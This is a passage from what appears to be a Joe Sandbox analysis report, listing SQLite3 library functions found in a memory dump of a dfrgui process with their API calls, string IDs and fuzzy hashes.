                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_value_int$sqlite3_result_blob
                                  • String ID: <
                                  • API String ID: 2918918774-4251816714
                                  • Opcode ID: 4d710e1ddf9ed5283a5eae10dc8128773a4645c94e470047452dbeff946b1fec
                                  • Instruction ID: 777d820699a3d28ee82df04858647ff8a5fb7a21084265ecacbd207c36769983
                                  • Opcode Fuzzy Hash: 4d710e1ddf9ed5283a5eae10dc8128773a4645c94e470047452dbeff946b1fec
                                  • Instruction Fuzzy Hash: 11116AB190430A8FCB04CF6AD88098ABBF5FF88364F15856EE4588B360E374E951CF91
                                  Function 61E29088 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E28F7C: sqlite3_log.SQLITE3(?,?,?,?,?,61E2902F), ref: 61E28FB7
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E290BB
                                  • sqlite3_value_text.SQLITE3 ref: 61E290D4
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E290EE
                                    • Part of subcall function 61E26168: sqlite3_log.SQLITE3 ref: 61E26191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_log$sqlite3_mutex_entersqlite3_mutex_leavesqlite3_value_text
                                  • String ID: out of memory
                                  • API String ID: 645246966-2599737071
                                  • Opcode ID: 327cdbda850600548ed336f27e198819550d1e49f93a352416d819d29f1af52a
                                  • Instruction ID: 68e5c2bea9a6ce457fbe0d4e19f577a1625aafdef1c3d86ffc27b5dcbd909762
                                  • Opcode Fuzzy Hash: 327cdbda850600548ed336f27e198819550d1e49f93a352416d819d29f1af52a
                                  • Instruction Fuzzy Hash: EC01A974A0C2855BDB409FB9C4E0A5AB7E4AF4531CF28D479DC598F301EB3AD990CB81
                                  Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: AddressHandleModuleProc
                                  • String ID: _Jv_RegisterClasses$libgcj-16.dll
                                  • API String ID: 1646373207-328863460
                                  • Opcode ID: bf21648c57dceb260ece4d8fe198b31ac0b988cdeb9f6110af85b8b41f393fc4
                                  • Instruction ID: 778d341767c2ee19b90e18f62addd533fb99b44d20927835abe6102458811233
                                  • Opcode Fuzzy Hash: bf21648c57dceb260ece4d8fe198b31ac0b988cdeb9f6110af85b8b41f393fc4
                                  • Instruction Fuzzy Hash: D6E06DB4508B018BF7507FE9840632EBAB9AFC670AF62C41CD489962A0E634C491C773
                                  Function 61E1F39F Relevance: 6.2, APIs: 4, Instructions: 228COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc.SQLITE3 ref: 61E1F406
                                    • Part of subcall function 61E1810B: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17DE4,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E18113
                                  • sqlite3_free.SQLITE3 ref: 61E1F51D
                                  • sqlite3_result_error_code.SQLITE3 ref: 61E1F640
                                  • sqlite3_result_double.SQLITE3 ref: 61E1F655
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_initializesqlite3_mallocsqlite3_result_doublesqlite3_result_error_code
                                  • String ID:
                                  • API String ID: 4229029058-0
                                  • Opcode ID: 1d6d91be48f74abf5363d4e429c2ae1da530b57b8650c984362c93972c50a3d2
                                  • Instruction ID: 1fb2550d0a476b77920fa1f89eefe42b29f5bff546b79c36bf27f57c6265e3e4
                                  • Opcode Fuzzy Hash: 1d6d91be48f74abf5363d4e429c2ae1da530b57b8650c984362c93972c50a3d2
                                  • Instruction Fuzzy Hash: EDA128B0A08609DFCB00DF69D584A8EBBF1FF48354F218929E859D7354EB34E955CB81
                                  Function 61E1EE99 Relevance: 6.1, APIs: 4, Instructions: 122COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: localtimesqlite3_mutex_entersqlite3_mutex_leavesqlite3_result_error
                                  • String ID:
                                  • API String ID: 2374424446-0
                                  • Opcode ID: 12ef7ea4453c32a645ba348bbfca8fb0439067479915be8a35ed3e638365756e
                                  • Instruction ID: 0b4c3f845fe4e23b27ca7b6e3ba5b2e459ab9091edf486b89d08fe00cbff84e0
                                  • Opcode Fuzzy Hash: 12ef7ea4453c32a645ba348bbfca8fb0439067479915be8a35ed3e638365756e
                                  • Instruction Fuzzy Hash: 8B512774D08359CFEB20CFA9C48478DBBF1AF49308F1085A9D488AB345D7759A85CF52
                                  Function 61E357D5 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 61E18CF4: sqlite3_malloc.SQLITE3 ref: 61E18D21
                                  • sqlite3_free.SQLITE3 ref: 61E35801
                                    • Part of subcall function 61E09B73: sqlite3_mutex_enter.SQLITE3 ref: 61E09B92
                                  • sqlite3_stricmp.SQLITE3 ref: 61E35834
                                  • sqlite3_free.SQLITE3 ref: 61E358CC
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_free$sqlite3_mallocsqlite3_mutex_entersqlite3_stricmp
                                  • String ID:
                                  • API String ID: 3567284914-0
                                  • Opcode ID: 992a08b87bdbc6ce544984c7a56340210eeb5e3efdd50e1bdfe6136643067e80
                                  • Instruction ID: dc230d9f6ae0c532c056c981194a03131c147d74a031a795d44411f3a328908d
                                  • Opcode Fuzzy Hash: 992a08b87bdbc6ce544984c7a56340210eeb5e3efdd50e1bdfe6136643067e80
                                  • Instruction Fuzzy Hash: 4431D274D0526A8BDB00DFA9C484A9EFBF0FF89318F658469D859AB310D735E842CF91
                                  Function 61E2052B Relevance: 6.1, APIs: 4, Instructions: 90COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc.SQLITE3 ref: 61E20563
                                    • Part of subcall function 61E1810B: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17DE4,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E18113
                                  • sqlite3_value_dup.SQLITE3 ref: 61E205B6
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E205EB
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_initializesqlite3_mallocsqlite3_result_error_nomemsqlite3_value_dup
                                  • String ID:
                                  • API String ID: 405757302-0
                                  • Opcode ID: 87600c0b77f07ead0ade44179710f080ee334b5572c52f4e0d7d60932daf917b
                                  • Instruction ID: 5356118802b60d337b76f0c5ccd8eac5a4a44d3a7500145d4f6ed008da818bff
                                  • Opcode Fuzzy Hash: 87600c0b77f07ead0ade44179710f080ee334b5572c52f4e0d7d60932daf917b
                                  • Instruction Fuzzy Hash: 973139B5A042598FCB00DFA9C481A9EBBF1FF8C314F15846AE848EB310D374E981CB90
                                  Function 61E39919 Relevance: 6.1, APIs: 4, Instructions: 89COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E39925
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
                                    • Part of subcall function 61E17C24: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E21F32), ref: 61E17C8F
                                    • Part of subcall function 61E17C24: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17F58
                                  • sqlite3_mutex_enter.SQLITE3 ref: 61E39945
                                  • sqlite3_vfs_find.SQLITE3 ref: 61E39984
                                  • sqlite3_mutex_leave.SQLITE3 ref: 61E39A83
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_configsqlite3_initializesqlite3_vfs_find
                                  • String ID:
                                  • API String ID: 321126751-0
                                  • Opcode ID: 07510577db503228338109d9e63834a7a6cec21cbf137bdb6bd830b064f46665
                                  • Instruction ID: 2925052ec6f8ffb2653a9c841e0327b3319ecebca38ac82514d50031fd149e6b
                                  • Opcode Fuzzy Hash: 07510577db503228338109d9e63834a7a6cec21cbf137bdb6bd830b064f46665
                                  • Instruction Fuzzy Hash: C241713581CAE98ECB16CB7A85807D97FB0AB9AF04F188ADBD5C44B343C674C489CB51
                                  Function 61E255B7 Relevance: 6.1, APIs: 4, Instructions: 85COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_snprintf$sqlite3_result_textsqlite3_value_blob
                                  • String ID:
                                  • API String ID: 3596987688-0
                                  • Opcode ID: 198b2a540f91bbaa916ca16fc22ca309423a60c73e34b668a02ea99b4488e3e4
                                  • Instruction ID: aff78ad72cde6f956bcd635203fbdd688f56649433091775984e00a83763de10
                                  • Opcode Fuzzy Hash: 198b2a540f91bbaa916ca16fc22ca309423a60c73e34b668a02ea99b4488e3e4
                                  • Instruction Fuzzy Hash: D131D3B1A082469FC740DF69C88168EBBF4BF89364F24C92DE4A8D7350D738D9518B91
                                  Function 61E23339 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_win32_is_nt.SQLITE3 ref: 61E233AF
                                  • sqlite3_snprintf.SQLITE3 ref: 61E23447
                                  • sqlite3_snprintf.SQLITE3 ref: 61E23467
                                  • sqlite3_free.SQLITE3 ref: 61E2346F
                                    • Part of subcall function 61E121BF: sqlite3_free.SQLITE3 ref: 61E12265
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_snprintf$sqlite3_win32_is_nt
                                  • String ID:
                                  • API String ID: 4082161338-0
                                  • Opcode ID: dea1325d79d4cb8f39a95486161e72f0f4d785326dc0a59a874b35ce858c0968
                                  • Instruction ID: 01f5ca3d36b0fe5d772d4e132c6b4fbd93eb2febc6a9fb70f98f8313ed5b30ac
                                  • Opcode Fuzzy Hash: dea1325d79d4cb8f39a95486161e72f0f4d785326dc0a59a874b35ce858c0968
                                  • Instruction Fuzzy Hash: 7631B3B09087469FDB00EFAAD45475EBBF4BB89758F20C81DE49897340DB78C9458F92
                                  Function 61E18F2A Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_malloc.SQLITE3 ref: 61E18F44
                                    • Part of subcall function 61E1810B: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E17DE4,?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E18113
                                  • sqlite3_stricmp.SQLITE3 ref: 61E18F8C
                                  • sqlite3_stricmp.SQLITE3 ref: 61E18FB3
                                  • sqlite3_free.SQLITE3 ref: 61E18FE1
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                  • String ID:
                                  • API String ID: 2308590742-0
                                  • Opcode ID: 369a55d0e78d401cd8b4eaab70aba31aa92e66541bfd7ba13a456de2a581296f
                                  • Instruction ID: 239ade2c88e345b63d3125612a5208ff0e442138152f448ae4bcdf34c5457b78
                                  • Opcode Fuzzy Hash: 369a55d0e78d401cd8b4eaab70aba31aa92e66541bfd7ba13a456de2a581296f
                                  • Instruction Fuzzy Hash: 9C21043060C2498BE7018E698442F5B7BE7AFCD318F39C568EE948B349D375D882A791
                                  Function 61E24BE6 Relevance: 6.1, APIs: 4, Instructions: 60COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_stricmpsqlite3_value_text
                                  • String ID:
                                  • API String ID: 3779612131-0
                                  • Opcode ID: 6f5c249ed8c5b195dbc60a8d19c9ec1c721389a6742e59e338c2db1eae5c3d28
                                  • Instruction ID: d568cac6a526a82d890d631b49871d951a43a6629fde0a10a13ea37ae9740c1d
                                  • Opcode Fuzzy Hash: 6f5c249ed8c5b195dbc60a8d19c9ec1c721389a6742e59e338c2db1eae5c3d28
                                  • Instruction Fuzzy Hash: B21163B16047499BDB049F6DD88128A7BE0FB88334F24C62EF9A88F380D374D5518F81
                                  Function 61E393FD Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_mprintf.SQLITE3 ref: 61E3944F
                                  • sqlite3_result_error.SQLITE3 ref: 61E39469
                                  • sqlite3_free.SQLITE3 ref: 61E39471
                                  • sqlite3_result_error_nomem.SQLITE3 ref: 61E3947B
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.636796223.0000000061E01000.00000020.00000001.01000000.0000000B.sdmp, Offset: 61E00000, based on PE: true
                                  • Associated: 00000008.00000002.636792768.0000000061E00000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636806507.0000000061E8D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636810381.0000000061E8F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636819386.0000000061E9E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636823745.0000000061E9F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636827724.0000000061EA1000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636831226.0000000061EA4000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  • Associated: 00000008.00000002.636834830.0000000061EA9000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_61e00000_dfrgui.jbxd
                                  Similarity
                                  • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                  • String ID:
                                  • API String ID: 3282944778-0
                                  • Opcode ID: e0f18fe1a90569e19bbeb38b9d90966295f1e2888eceb96954b35f917cdae40f
                                  • Instruction ID: bc79f1c4db913d7eaf01e0e3fbf7de07ba2165e3ae0216f6af8ad6ba6708388c
                                  • Opcode Fuzzy Hash: e0f18fe1a90569e19bbeb38b9d90966295f1e2888eceb96954b35f917cdae40f
                                  • Instruction Fuzzy Hash: 7A0161B09087568AD7149F69D4802AEBFF4AFC5368F24C52DD49987340DB38D582CB92
                                  Function 61E88A8C Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                  Download Yara Rule
                                  APIs
                                  • sqlite3_initialize.SQLITE3 ref: 61E88A98
                                    • Part of subcall function 61E17C24: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1E712), ref: 61E17C5B
